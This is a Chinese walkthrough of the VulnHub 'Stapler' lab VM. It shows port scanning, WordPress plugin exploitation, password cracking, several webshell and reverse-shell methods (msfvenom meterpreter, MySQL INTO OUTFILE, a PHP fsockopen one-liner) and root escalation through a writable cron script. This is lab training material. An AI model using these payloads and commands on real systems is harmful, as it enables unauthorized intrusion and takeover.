首页 > 其他分享 >vulnhub-Stapler

vulnhub-Stapler

时间:2022-12-27 16:58:21浏览次数:39  
标签:Stapler 192.168 12380 tcp vulnhub https php 56.121

kali:192.168.56.109
靶机:192.168.56.121

nmap -sS -sV -O -T5 -p- 192.168.56.121

Nmap scan report for 192.168.56.121
Host is up (0.0020s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))

MAC Address: 08:00:27:A1:A0:2C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

查看ftp

查看从ftp下载的文件,得到用户名 Elly John

访问 666 端口获得一个zip压缩包,解压得到一张图:

web 服务

访问 80 12380 端口均为获得有效信息。使用扫描工具扫描80和12380,发现 http://192.168.56.121/.bashrc http://192.168.56.121/.profile,12380端口的站点可用 awvs nikto 扫描。
nikto -h https://192.168.56.121:12380发现 /blogblog/ 目录为wordpress站点

使用wpscan扫描wp站点wpscan --url https://192.168.56.121:12380/blogblog/ --disable-tls-checks --api-token xxxxxxxxxxxxx
得到一些路径:

https://192.168.56.121:12380/blogblog/wp-login.php?action=register
https://192.168.56.121:12380/blogblog/wp-content/uploads/
https://192.168.56.121:12380/blogblog/wp-cron.php

查看upload目录,此处存在多层目录

wp 插件漏洞

发现嵌入式视频插件

搜索得到漏洞 39464

通过searchexploit得到漏洞利用脚本,进行一下修改以适应https


使用python2运行后生成一张图片

使用wget下载 wget https://192.168.56.121:12380/blogblog/wp-content/uploads/1398406969.jpeg --no-check-certificate
发现这个图片实际上是一个php脚本,得到wordpress配置信息

得到mysql的root密码,可通过 https://192.168.56.121:12380/phpmyadmin/ 或直接登录mysql



进行密码破解:john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

得到一个有用的用户与密码 John:incorrect,登录之前得到的登录网站链接 https://192.168.56.121:12380/blogblog/wp-login.php
成功登录后,可以再使用扫描器扫描

webshell

  1. 上传新插件


    可以上传 php-reverse-shell.php 或 weevelywebacoo生成的php木马 得到shell,上传的文件在upload文件夹下,点击可得shell

  2. 使用 msf
    # 生成php木马
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -F raw > ms.php
再手动上传

# 监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST ...
set LPORT ...
exploit -j  # 后台监听shell

访问文件后msf得到shell
  3. mysql into outfile 写入文件
    select "<?php  echo shell_exec($_GET['cmd']; ?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";

    再执行

    php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

    更多的一句话木马可参见: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 

获得shell后可使用 linux-exploit-suggester、LinEnum、linpeas 等枚举信息。发现账号 Peter 能使用sudo,可使用sudo提权。

提权

  1. linux内核提权

    直接从gitlab下载 proxychains wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip传到靶机,解压编译运行,得到shell。
  2. CVE-2021-4034
  3. 通过ssh
    在 /home 目录下,执行 grep -rn "ssh"

    通过 ssh [email protected] 直接连到靶机。可见其有sudo权限,使用 sudo su 拿到root
  4. 写入定时任务

    这个定时任务以root权限执行,且当前用户可编辑
    echo "cp /bin/dash /tmp/exp;chmod u+s /tmp/exp;chmod root:root /tmp/exp" >> /usr/local/sbin/cron-logrotate.sh

共享文件 samba 服务

靶机还开放了139端口,用于samba服务。使用 Enum4Linux 枚举 enum4linux -a 192.168.56.121
得到://192.168.56.121/kathy  //192.168.56.121/tmp
并存储枚举出的用户名到文件,可用于枚举ssh hydra -L user.txt -P user.txt 192.168.56.121 ssh,也可用于爆破ftp。没什么有用信息。

可能存在linux版本的永恒之蓝漏洞 cve-2017-7479,但没有利用成功

标签:Stapler,192.168,12380,tcp,vulnhub,https,php,56.121
From: https://www.cnblogs.com/zhh567/p/17002760.html

相关文章

  • vulnhub靶场之HACKABLE: III
    准备:攻击机:虚拟机kali、本机win10。靶机:Hackable:III,下载地址:https://download.vulnhub.com/hackable/hackable3.ova,下载后直接vbox打开即可。知识点:lxd提权、hydra爆......
  • Vulnhub之My CMSCMS靶机详细测试过程(采用不同的拿web shell的方法)
    MyCMSCMS作者:Jason_huawen靶机基本信息名称:MyCMSMS:1地址:识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/MyCMSCMS]└─$sudonetdiscover-ieth1Currentl......
  • vulnhub靶场之GROTESQUE: 3.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:Grotesque:3.0.1,下载地址:https://download.vulnhub.com/grotesque/grotesque3.zip,下载后直接vbox打开即可。知识点:ffuf参数爆破......
  • vulnhub-Tr0ll2
     Tr0ll:2~VulnHubwww.vulnhub.com/entry/tr0ll-2,107/kali192.168.56.109靶机192.168.56.120nmap-sS-A-O-p-192.168.56.120Nmapscanreportfor192.168......
  • vulnhub-LordOfTheRoot
    https://www.vulnhub.com/entry/lord-of-the-root-101,129/本机10.0.2.4靶机10.0.2.15靶机是桌面版ubuntu,提示了登录用户名smeagolnamp扫描,发现只有22端口开放。使......
  • vulnhub-IMF
    www.vulnhub.com/entry/imf-1,162/kali 192.168.10.7靶机192.168.10.10nmap-sV-A-O-p-192.168.10.10Nmapscanreportfor192.168.10.10Hostisup(0.0020......
  • vulnhub靶场,Me-and-My-Girlfriend-1
    靶场地址和背景:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,......
  • vulnhub-DerpNStink
    DerpNStink:1~VulnHub www.vulnhub.com/entry/derpnstink-1,221/修改hosts文件,使IP绑定到derpnstink.localkaliip:192.168.56.109主机扫描主机发现nmap-sn......
  • Vulnhub之ReconForce靶机详细测试过程
    ReconForce作者:jason_huawen靶机基本信息名称:ReconForce(v1.1)地址:https://www.vulnhub.com/entry/hacknos-reconforce-v11,416/识别目标主机IP地址──(kali㉿ka......
  • Vulnhub之Replay靶机测试过程(部分)
    Replay识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Replay]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.64.0/16|ScreenView:UniqueHosts......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99